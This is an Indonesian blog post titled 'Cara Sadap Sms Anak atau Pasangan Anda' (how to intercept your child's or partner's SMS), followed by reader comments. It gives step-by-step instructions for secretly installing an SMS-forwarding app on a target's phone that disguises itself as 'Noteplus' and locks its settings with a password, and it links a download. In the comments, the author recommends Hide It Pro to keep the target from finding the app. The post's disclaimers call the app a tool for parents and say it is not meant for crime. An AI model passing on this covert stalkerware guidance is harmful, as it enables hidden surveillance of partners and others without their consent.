Cara Zone

Portal online Tips dan tutorial

Dapatkan tutorial terupdate gratis dengan berlangganan artikel

Thursday, September 11, 2014

Cara Sadap Sms Anak atau Pasangan Anda

Cara Sadap Sms Anak atau Pasangan Anda
Menyadap SMS melalui Ponsel Android,Tutorial kali ini bukan bermaksud mengajarkan anda untuk bertindak Sewenang-wenang

MOHON DIPERHATIAKAN !!
  • Aplikasi ini dibuat dan ditujukan untuk orang tua dengan kegunaan memantau anak anak dari perbuatan nakal atau yang dicurigai ataupun tidak pantas, sehigga para orangtua dapat mengambil sikap lebih dini dan terkendali kepada anak anak nya agar tidak berbuat yang menyipang
  • Aplikasi ini dibuat bukan untuk kejahatan
  • Aplikasi ini berguna sebagi alat pelacak untuk menemukan perangkat yang hilang atau tercuri karena walaupun perangkat berganti kartu sim akan tetap mengirimkan data sms masuk kepada nomer yang sudah di seting serta dilengkapi fitur pelacakan GPS sehingga dapat membantu anda menemukan kembali gadget anda yang hilang
  • Aplikasi ini digunakan untuk memantau anak demi keselamatan anak
  • Aplikasi ini berguna bagi anda yang memiliki dua handphone namun ini meiliki fasilitas pengiriman pesan satu antara lain. maka aplikasi inilah solusinya
  • Aplikai ini akan berubah nama setelah di install menjadi Noteplus karena ini untuk kamuflase agar aplikasi ini aman tidak di curigai
  • Aplikasi ini dibuat bukan untuk kejahatan

Harap dicatat !!
  • bahwa segala kerugian atas penggunaan ataupun penyalah gunaan aplikasi ini bukan tangggung jawab pembuat aplikasi...
  • Segala tindak tindak penyalah gunaan aplikasi tanggung jawab anda sendiri
  • Gunakan secara bijak dan bertanggung jawab

CARA PENGGUNAAN
  • Install Aplikasi di Hape Anak (Target)
  • Buka aplikasi masuk ke pengaturan (atau saat pertama menjalankan ada peringatan mengatur pilih iya)
  • Buka pilihan penyadapan > ceklis kirim hasil penyadapan > pilih nomer telpon > maka terlihat angka 12345678 > ganti angka tersebut dengan nomer anda untuk mengirimkan hasil penyadapan > setelah selesai OK

TAMBAHAN PELINDUNG
untuk melindungi agar aplikasi tidak dapat di rubah pengaturan nya kecuali oleh anda lakukan langkah berikut
  • Masuk Pengaturan
  • ceklis kolom > Gunakan perlindungan password
  • pilih perlindungan password > masukan password anda
  • selesai
Jika anda tidak mengerti yang lain biar kan saja tidak usah diatur lagi. karena langka diatas saja yang diperlukan yang lainya hanya opsional (pilihan)

Untuk mengecek aplikasi berjalan atau tidak ikuti langkah berikut
buka aplikasi > maka pada tampilan pertama terlihat gambar gembok dan status

  • jika gembok berwana hitam putih dan tulisan > Status : Mati = menandakan aplikasi belum berjalan
  • untuk mengaktifkan nya cukup tekan di gambar gembok (Bagi yang melakukan perlindungan password silhkan masukan password anda dlu) lalu tunggu sampai gembok berubah warna menajadi HItam Biru > dan tulisan Status : Aktif = (ini menandakan aplikasi sudah berjalan/aktif)
  • Status : (untuk menandakan aplikasi aktif atau tidak)
  • Jumlah paket : ( ini status jumlah pesan yang telah disadap dan dikirimlan ke nomor anda)

Jika anda lupa password anda sehingga tidak dapat melakukan pengaturan kembali. maka hapus (uninstall) aplikasi terlebih dahulu lalu pasang ulang, dan lakukan pengaturan lagi seperti langkah diatas.

Unduh Aplikasinya disini : Free Download
CaraZone


Masih belum jelas silahkan tonton video tutorialnya :

30 comments:
Silahkan komentar
  1. .. kalo ada yg aneh di hape nya,, bisa aja sang empu hape atau target langsung unistall. so,, ada cara nya gak untuk menyembunyikan aplikasi itu agar tidak terlihat?!? ..

    ReplyDelete
    Replies
    1. Silahkan menggunakan app Aplikasi Hide It Pro, cari di google playstore
      terimakasih saran dan komentarnya

      Delete
    2. trus gmn klo hide it pro udah d instal ..gmn caranya

      Delete
    3. Jika sudah menginstall Hide It Pro , pada menu app tersebut sudah ada layanan app mana saja yang akan kita sembunyikan.
      Nah silahkan pilih app Penyadap SMS atau app lain yang ingin disembunyikan

      Delete
    4. masalahnya hide it pro udah d instal...tp cara download app carazone gmn..app penyadap sms

      Delete
    5. Silahkan download langsung disini
      https://play.google.com/store/apps/details?id=blacx.penyadap.sms

      Delete
    6. link download app penyadap hp gan

      Delete
  2. hanya untuk hp android doang...?
    buat hp yang lainnya apa ada...?

    ReplyDelete
  3. Aplikasi'a klo mantau dari PC bs ga? apa harus sesama HP Android?

    ReplyDelete
    Replies
    1. Sebenarnya untuk memantau dari PC sudah ada kok, tapi sementara bisa pakai bluestack, jadi intinya bluestack yakni sebuah software yang bisa menjalankan aplikasi Android

      Delete
  4. Apakah aplikasi ini hanya bisa digunakan apabila ada koneksi internet..?

    ReplyDelete
  5. makasih ya gan untuk infonya

    ReplyDelete
  6. Dengan memakai aplikasi tersebut, apakah smartphone tersebut perlu di Rooting terdahulu dan apakah aplikasi ini sudah termasuk menyadap socialmedia seperti BBM dll???

    ReplyDelete
    Replies
    1. Tidak perlu rooting, hanya menyadap SMS dan Telp
      Terima Kasih

      Delete
    2. saya sudah menggunakannya, namun yang tersadap cuma sms masuk saja.. bagaimana caranya agar sms keluar juga tersadap?

      Delete
  7. kalo hp nya bukan android bagaimana ?

    ReplyDelete
  8. hp target iphone tp di apple store untuk aplikasi ini tdk ad? apa ada cara lain? thx

    ReplyDelete
  9. Min gimana uninstall aplikasi ini ? Krn saya lupa psswrdx.Biasax bisa uninstall app lain, tapi ini koq sprt terrsembunyi

    ReplyDelete
    Replies
    1. Silahkan masuk ke setting App, klik dulu force stop klik clear data
      barulah klik unistall
      Terima kasih

      Delete
  10. kalo untuk iphone ada ga<<
    atau pc

    ReplyDelete
  11. bener juga nih.. biar saya bisa ngawasin kelakuan anak saya pas gak lagi dalam pengawasan saya

    ReplyDelete
  12. aura mau coba lah sadap sms android nya, terimakasih ya gan..

    ReplyDelete
  13. bang,, link downloadnya kok error ya? page is not found???
    mohon responya ya bang

    ReplyDelete
  14. di donload kok ngak bisa min ?
    Udah di hapus kah?

    ReplyDelete
  15. min ini klo serching di playstore nya apa di pc ane tulisannya url not found

    ReplyDelete
  16. Gan gimana nihh... kok item tidak ditemukan yaa... ???

    ReplyDelete
  17. Gan klo yg mau disadap hp nya hp non android bisa gak? Ataw kah harus sma" android sja?

    ReplyDelete
  18. gan link download app penyadap sms
    oia apa itu harus terhubung koneksi internet kah

    ReplyDelete
  19. Klo targetnya iphone pk apa? Dr atas ga d jwb...

    ReplyDelete

Silahkan Follow atau Like FP Cara Zone
Join Our Newsletter